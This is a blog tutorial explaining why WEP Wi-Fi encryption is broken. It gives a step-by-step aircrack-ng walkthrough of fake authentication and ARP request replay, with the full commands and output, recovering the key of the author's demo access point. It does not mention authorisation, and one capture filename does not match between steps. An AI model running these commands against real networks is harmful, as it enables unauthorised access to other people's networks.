Thanos Stantzouris Industrial Engineer & Web Developer

Good day to all of the Duthcode hackers out there, both the experienced and the knowledge-hungry! I had some free time in my hands and decided to write a story for all of you to read! I call it :

WHY WEP IS NO LONGER WITH US

In this small write-up, I will try to clarify why we don't use the Wired Equivalent Privacy (WEP) anymore to secure our networks! But! Since I know you are a person of action like me, I will be including a short tutorial, in the end, showing you how to crack any WEP password protected network easily with 2 methods called Fake Authentication Attack & ARP Request Replay Attack.

But first the Story...

The early years of WEP

WEP or Wired Equivalent Privacy network protocol was introduced in the vicinity of the new millennium and was supposed to secure the previously open Wi-Fi and other 802.11 networks. It was designed to give wireless networks the equivalent level of privacy protection as a comparable wired network. But it failed miserably.

How it works

The WEP encryption uses the RC4 (Rivest Cipher 4) key scheduling algorithm. It implements a data encryption scheme that uses a combination of user and system generated values.
When deployed over a wireless network it encrypts the client's data using a key, it then sends the encrypted packet in the air and to the router where the packet gets decrypted using the same key.
 

WEP Encryption steps on a network


A quick note, The algorithm, and the way RC4 works is quite fine actually. The problem is how WEP implements the algorithm.

The protocol, as I mentioned above, was officially brought to the light in 1999. Two years later, mathematicians showed that it was severely flawed, but the attackers would need around 4 million packets of data in order to calculate the original key. Since then, several flaws found in the algorithm, and the cracking time was reduced down to minutes.

I, once, read on an article that was written back in 2007 that it took a 1.7GHz Pentium-M computer 2 minutes to crack a 104-bit WEP secure key, and it had a 95% success rate. My current machine has an Intel Core i7-7700HQ CPU @ 2.80GHz and the largest WEP secure key available is 256-bit. I believe that you have already begun to imagine why WEP failed as an encryption protocol. [source]

Example :

A 152-bit and 256-bit WEP systems are available from some vendors. As with the other WEP variants, 24 bits of that is for the IV, leaving 128 or 232 bits for actual protection. These 128 or 232 bits are typically entered as 32 or 58 hexadecimal characters (4 bits × 32 + 24 bits IV = 152 bits of WEP key, 4 bits × 58 + 24 bits IV = 256 bits of WEP key). Most devices also allow the user to enter it as 16 or 29 ASCII characters (8 bits × 16 + 24 bits IV = 152 bits of WEP key, 8 bits × 29 + 24 bits IV = 256 bits of WEP key).


Quick Steps to WEP Encryption

The WEP encryption can be easily broken down in 4 bullets detailing its key elements:

  • Each packet is encrypted using a unique keystream
  • Random initialization vector [IV] is used to generate the key streams
  • The IV is only 24 bits
  • IV + given password = KeyStream

 

What is the problem exactly?

Ok yeah, we got the point, WEP is shit. But, why? The main reasons are :

  • IV is too small (only 24bits)
  • The IVs are sent in plain text

The main result of these points above is that

By putting all the aforementioned bullets into perspective, with the help of aircrack-ng, we can exploit the core vulnerability of WEP, crack its encryption, and determine the password accurately.

 

Cracking WEP Encryption with aircrack-ng

In my very humble opinion, a hacker needs to have the knowledge of cracking even the most outdated vulnerability. Also, do you think it would be wise to call yourself a hacker without knowing how to crack WEP?

Personal Experience: I remember I started wireless hacking back in 2012. Back then there was this Mobile Network Operator in Greece who would only install Routers with WEP as the default network privacy protocol, so I, the new wireless hacker apprentice had a reason to learn how to crack WEP. As the years went by,  even they changed to WPA2. So I never needed the WEP cracking methodology again.
That was until two months ago! DUN DUN DUUUUUN! No seriously! My father caught the Drone fever, and decided that it would be a good idea to spend his money on a new 500$ Xiaomi Drone! Well, guys and gals, you guessed it! The drone's mobile application was communicating with the smartphone via WEP! :)
There are always outdated vulnerabilities out there! Prepare for the worst but god forbid if you are not prepared for the easy stuff!
[END OF P.E]

 

Continuing:
As I have mentioned above, if you want to crack a WEP encryption you need a busy network because you also need a large number of IVs. But what happens if the network you are trying to attack is idle?
You could always do what a skilled Hacker has to do on most of the occasions, wait patiently.

But!!! We only wait if it is the last thing left for us to do!
 

Introducing the Fake Authentication

Official Description: The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) plus associate with the access point (AP). This is only useful when you need an associated MAC address in various aireplay-ng attacks and there is currently no associated client. It should be noted that the fake authentication attack does NOT generate any ARP packets. Fake authentication cannot be used to authenticate/associate with WPA/WPA2 Access Points.

We need this authentication approach because APs only communicate with connected clients and if we are not somehow associated with it we can not even start the main attack.

Associating with the AP before launching the attack

Please do not confuse this method. We are not connecting with the target AP, we just want to let it know that we want to communicate with it so it wouldn't block our requests. So let's associate with our target network.

STEP 1st | Monitor for targets

Put your wireless card in monitor mode:

airmon-ng start wlan0

 

And then search for targets:

airodump-ng wlan0mon

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER   AUTH   ESSID 
50:C7:BF:DC:4C:E8  -25       30       78    0   1  270  WEP  WEP             duthcode_AP              

In this result, we see that our target is duthcode_AP

  • BSSID : 50:C7:BF:DC:4C:E8
  • ENC: WEP
  • CIPHER: WEP

And once you acquire the targets BSSID as we did then you run the following command and leave it running:

-----------------------------------------------------------------------------

airodump-ng --bssid 50:C7:BF:DC:4C:E8 --channel 1 --write arpreplay wlan0mon

-----------------------------------------------------------------------------

 CH  1 ][ Elapsed: 18 s ][ 2019-03-03 13:48                                         
                                                                                                 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                 
 50:C7:BF:DC:4C:E8  -15 100      188     0     0    1   270  WEP  WEP         duthcode_AP        
                                                                                                 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe 

 

 

This is a very simple command that I have used before in my previous tutorials it goes like this:

  • airodump-ng: we use airodump-ng to capture data from a network
  • -- bssid: The BSSID of the network
  • -- channel: The channel in which the network is running
  • -- write: Write everything in a file called arpreplay

This is a monitoring process!!! Please do not close the monitoring process, just leave it monitoring as is!

Notice that under the AUTH the field is empty and also no STATION is found!

 

Step 2nd | Associate with the Network

To achieve this Fake Association we will use the tool aireplay-ng.

aireplay-ng --fakeauth 0 -a 50:C7:BF:DC:4C:E8 -h 00:27:19:B2:D5:65 wlan0mon
  • --fakeauth:  because we want to do a Fake Authentication attack
  • 0: Because we are only doing this once
  • -a: Mac Address of the network
  • -h: Mac Address of our wireless adapter

To find the MAC Address of our wireless adapter we type ifconfig and we copy the first 12 digits of the unspec field and replace the minuses with semicolumns

wlan0mon: flags=867<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,ALLMULTI>  mtu 1500

 -----> unspec 00-27-19-B2-D5-65-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)

        RX packets 491071  bytes 149637165 (142.7 MiB)
        RX errors 0  dropped 479748  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • wlan0mon: The name of our wireless adapter in monitor mode

When we press enter and execute this command we should see, under the AUTH field that previously was empty, OPN and we should also have a new client associated with the network that has the same MAC Address as our wireless adapter.

Now we need to communicate with the network in a way to force it into generating new packets with new IVs which will help us crack the key very quickly!

 

ARP Request Replay Attack

Description: The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.[Source]

What is ARP?

ARP is address resolution protocol: A TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the address in the request then replies with its physical hardware address.

Command:

aireplay-ng --arpreplay -b 50:C7:BF:DC:4C:E8 -h 00:27:19:B2:D5:65 wlan0mon

Very similar command as the one we ran before! Just instead of --fakeauth 0 -a we wrote --arpreplay -b. Once you run the command wait for an ARP packet to be sent in the air. Once you see the ARP number increasing very fast you can run the last cracking command.

Cracking Command:

aircrack-ng aireplay-01.cap

And that's it! Just wait for a few minutes and the key will appear!

KEY FOUND! [ 64:75:74:68:63:30:64:65:52:75:6c:65:7a ] (ASCII: duthc0deRulez)
   Decrypted correctly: 100%

 

Because WEP is THAT MUCH VULNERABLE!


That was it! Thank you for reading! If you liked that article here are some other articles that you will most definetely love:

 

You can show your support by liking our Facebook Page ! Support our efforts on Ko-Fi ! And you can get in contact with us either by sending us a message on Facebook or via the e-mail on the footer of the Page!

Thanks again! Have a lovely day... Or night!